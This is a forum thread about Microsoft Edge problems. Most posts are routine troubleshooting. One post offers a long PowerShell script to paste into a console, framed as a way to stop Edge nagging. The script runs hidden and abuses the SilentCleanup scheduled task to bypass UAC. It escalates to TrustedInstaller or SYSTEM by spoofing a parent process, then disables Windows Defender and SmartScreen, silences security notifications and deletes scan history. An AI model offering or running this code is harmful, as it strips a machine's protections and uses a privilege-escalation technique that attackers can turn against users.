[DISCUSSION] Microsoft Edge

Discussion in 'Application Software' started by SAM-R, Mar 18, 2019.

  1. jd91

    jd91 MDL Novice

    Jan 17, 2020
    8
    1
    0
  2. tistou77

    tistou77 MDL Expert

    Mar 22, 2008
    1,822
    573
    60
    I also use Kaspersky, maybe for this
    I have enabled Smart Screen in Edge to stop getting this message, waiting for MS to fix this problem
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. AveYo

    AveYo MDL Expert

    Feb 10, 2009
    1,836
    5,685
    60
    Since you use another AV, just copy-paste ToggleDefender once into a powershell console and choose Yes when prompted, it will set policies to stop such nagging in Edge:
    Code:
    @(echo off% <#%) &color 07 &title Windows Defender Toggle, AveYo 2020-08-27 &rem -fixed tweaks; hidden window
    set "0=%~f0" &set 1=%*& powershell -nop -win Hidden -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
    
    $PS ={ $Main ={
    if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$STATUS='Defender is OFF'}else{$TOGGLE=6;$STATUS='Defender is ON'}
    
    ## Uncomment to show a dialog prompt with Yes, No, Cancel (6,7,2)
     if ($env:1 -ne 6 -and $env:1 -ne 7) {
       Add-Type -As PresentationFramework;$choice=[System.Windows.MessageBox]::Show('Disable Windows Defender?',$STATUS,3,32);
       if ($choice -eq 2) {exit} else {$c=[int]$choice; $env:1=$c}
     }
    
    ## Without the dialog prompt above will toggle automatically
    if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
    
    ## Comment to not relaunch systray icon
    try{start SecurityHealthSystray}catch{}; try{start 'C:\Program Files\Windows Defender\MSASCuiL.exe'}catch{}
    
    $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
    ni $notif -ea 0|out-null; sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
    
    ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bypass?
    $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
    $bypass=$baffling.GetTask('SilentCleanup'); $flaw=$bypass.Definition
    
    ## Cascade elevation
    $r=[char]13; $i=[char]39+$(date)+$r+' (\   /)'+$r+'( * . * )   UAC is useless below Always-Notify'+$r+'    ```'+$r+[char]39
    $script='-nop -win hidden -c & {mode 50,1;rp hkcu:\environment windir -ea 0;$i='+$i+';$env:1='+$env:1+';$PS={'+$PS+'};& $PS}'
    $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
    
    ## 0: limited-user: must runas
    if ($u -eq 0) {
      start powershell -args $script -verb runas -win 1; exit
    }
    
    ## 1: admin-user non-elevated: try lame uac bypass before runas
    if ($u -eq 1) {
      if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; exit}
      sp hkcu:\environment windir $('powershell '+$script+' #')
      $z=$bypass.RunEx($null,2,0,$null); $wait=0; while($bypass.State -gt 3 -and $wait -lt 7){sleep -m 100; $wait+=0.1}
      if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0; start powershell -args $script -verb runas -win 1}
      exit
    }
    
    ## 2: admin-user elevated: get ti/system via schtasks on 1903+
    if ($u -eq 2 -and [Environment]::OSVersion.Version.Build -gt 17763) {
      $act=New-ScheduledTaskAction -Execute powershell -Argument $script
      $z=Register-ScheduledTask -TaskName '~ti' -Action $act -User 'NT SERVICE\TrustedInstaller' -Force|out-null
      $f=$ts.GetFolder('\'); $t=$f.GetTask('~ti'); $t.Stop(0); $z=$t.RunEx($null,2,0,$null); $f.DeleteTask('~ti',0); exit
    }
    ## 2: admin-user elevated: get ti/system via runasti snippet on older builds  [hidden:235406848 show:235406864]
    elseif ($u -eq 2) {
      $cmd='powershell '+$script
      $DM=[AppDomain]::CurrentDomain.DefineDynamicAssembly(1,1).DefineDynamicModule(1);$S=[String];$P=[IntPtr];$I=[UInt32];$J=[Int16]
      $D=@($DM.DefineType('A',257)); 1..5|%{$D+=$D[0].DefineNestedType('Y'+$_,1179914,[ValueType])}; 4,5|%{$D+=$D[$_].MakeByRefType()}
      $F=0,($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$S,$S,$S,$I,$I,$I,$I,$I,$I,$I,$I,$J,$J,$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
      1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k].DefineField('f'+$n++,$_,6)}}; $M=[System.Runtime.InteropServices.Marshal]; $Z=$P::Zero;
      $9=$D[0].DefinePInvokeMethod('CreateProcess','kernel32',8214,1,[Int],@($S,$S,$P,$P,[Int],[Int],$P,$S,$D[6],$D[7]),1,4)
      $T=@();0..5|%{$T+=$D[$_].CreateType();nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $T1.f1=131072; $T1.f2=$P::Size;
      'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ >$null 2>&1;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
      $v=$M::AllocHGlobal($P::Size); $M::WriteIntPtr($v,$pn.Handle); $T1.f3=$v; $T2.f1=1;$T2.f2=1;$T2.f3=1;$T2.f4=1; $T2.f6=$T1;
      $T3.f1=$M::SizeOf([Type]$T[4]);$T4.f1=$T3;$T4.f2=$M::AllocHGlobal($M::SizeOf([Type]$T[2]));$M::StructureToPtr($T2,$T4.f2,$false)
      $9=$T[0].GetMethod('CreateProcess').Invoke($null,@($null,$cmd,$Z,$Z,0,235406848,$Z,$null,($T4 -as $D[4]),($T5 -as $D[5]))); exit
    }
    
    ## Create registry paths
    $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
    
    ## Toggle Defender
    if ($env:1 -eq 7) {
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      sc.exe config windefend depend= RpcSs
      kill -Force -Name MpCmdRun -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
    } else {
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      net1 stop windefend
      sc.exe config windefend depend= RpcSs-TOGGLE
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
    # rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0 ## Commented = fake having another av installed
      kill -Force -Name MpCmdRun -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
    }
    
    ## PERSONAL CONFIGURATION TWEAK - UNCOMMENT #rp ENTRIES TO REVERT
      sp $wdp DisableLocalAdminMerge 1 -Type Dword -Force -ea 0                           ## Scriptable Admin Exclusions OFF
      rp $wdp DisableLocalAdminMerge -Force -ea 0                                         ## Scriptable Admin Exclusions ON [default]
      sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0                     ## Auto Actions OFF
    # rp $wdp DisableRoutinelyTakingAction -Force -ea 0                                   ## Auto Actions ON [default]
      sp $wdp PUAProtection 1 -Type Dword -Force -ea 0                                    ## Potential Unwanted Apps ON
    # rp $wdp PUAProtection -Force -ea 0                                                  ## Potential Unwanted Apps OFF [default]
      sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0                  ## Cloud blocking level HIGH
    # rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0                                ## Cloud blocking level LOW [default]
      sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0                      ## Cloud protection ADVANCED
    # rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0                                    ## Cloud protection BASIC [default]
      sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0                 ## Sample Submission ALWAYS-PROMPT
    # rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0                               ## Sample Submission AUTOMATIC [default]
      sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0  ## Scan incoming file only
    # rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0                ## Scan incoming and outgoing file [default]
    
    ## Uncomment to close alwaysnotify-compatible lame uac bypass flaw and reset uac
    # if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
    #   $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe'               ## %windir%\system32\cleanmgr.exe [default]
    #   $baffling.RegisterTaskDefinition($bypass.Name,$flaw,20,$null,$null,$null)         ## UAC silent bypass mitigation
    #   $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    #   sp $uac EnableLUA 1 -Type Dword -Force -ea 0                                      ## UAC enable
    #   sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0                     ## UAC always notify - bypassable otherwise
    #   sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0                          ## UAC secure - prevent automation
    # }
    
    }; & $Main }; & $PS
    #-_-# hybrid script, can be pasted directly into powershell console
    
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. Jaroslaww

    Jaroslaww MDL Novice

    Aug 23, 2019
    16
    2
    0
    Hi guys. Is it possible somehow restore old Quick Links icons? New icons are too small and looks terrible. Thanks
     

    Attached Files:

  5. kaljukass

    kaljukass MDL Guru

    Nov 26, 2012
    3,389
    1,321
    120
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. baguettez

    baguettez MDL Novice

    Dec 13, 2016
    31
    6
    0
    I'm having an issue recently with Edge, it doesn't let me save .webm video files. Instead, it opens the link with my external video player (mpv). It used to work fine before.
    Clicking Save As, using the Ctrl+S shorcut or clicking the three dots and selecting Download, all the same. Instead of the traditional Save as file dialog, it opens a dialog saying if I want to open the file, which then launches my external video player, streaming the file from the link.
     
  7. kaljukass

    kaljukass MDL Guru

    Nov 26, 2012
    3,389
    1,321
    120
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. baguettez

    baguettez MDL Novice

    Dec 13, 2016
    31
    6
    0
  9. tistou77

    tistou77 MDL Expert

    Mar 22, 2008
    1,822
    573
    60
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  10. tistou77

    tistou77 MDL Expert

    Mar 22, 2008
    1,822
    573
    60
    Ah ok, it's good for me for download
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  11. baguettez

    baguettez MDL Novice

    Dec 13, 2016
    31
    6
    0
  12. kaljukass

    kaljukass MDL Guru

    Nov 26, 2012
    3,389
    1,321
    120
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  13. baguettez

    baguettez MDL Novice

    Dec 13, 2016
    31
    6
    0
    It's just stable Edge (Version 86.0.622.38 (Official build) (64-bit), I never installed Canary.

    I was looking through edge://flags but I can't find anything that may be related
     
  14. cuteee

    cuteee MDL Guru

    Oct 13, 2012
    5,717
    978
    180
    Canary is the best.
     
  15. kaljukass

    kaljukass MDL Guru

    Nov 26, 2012
    3,389
    1,321
    120
    Then you must have something wrong with the settings or something missing in the registry. There is no other option.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  16. baguettez

    baguettez MDL Novice

    Dec 13, 2016
    31
    6
    0
    As I said I haven't touched anything. It all started happening with the latest update from 2 or 3 days ago.

    I'll just wait for the next update and see what happens, thanks anyways.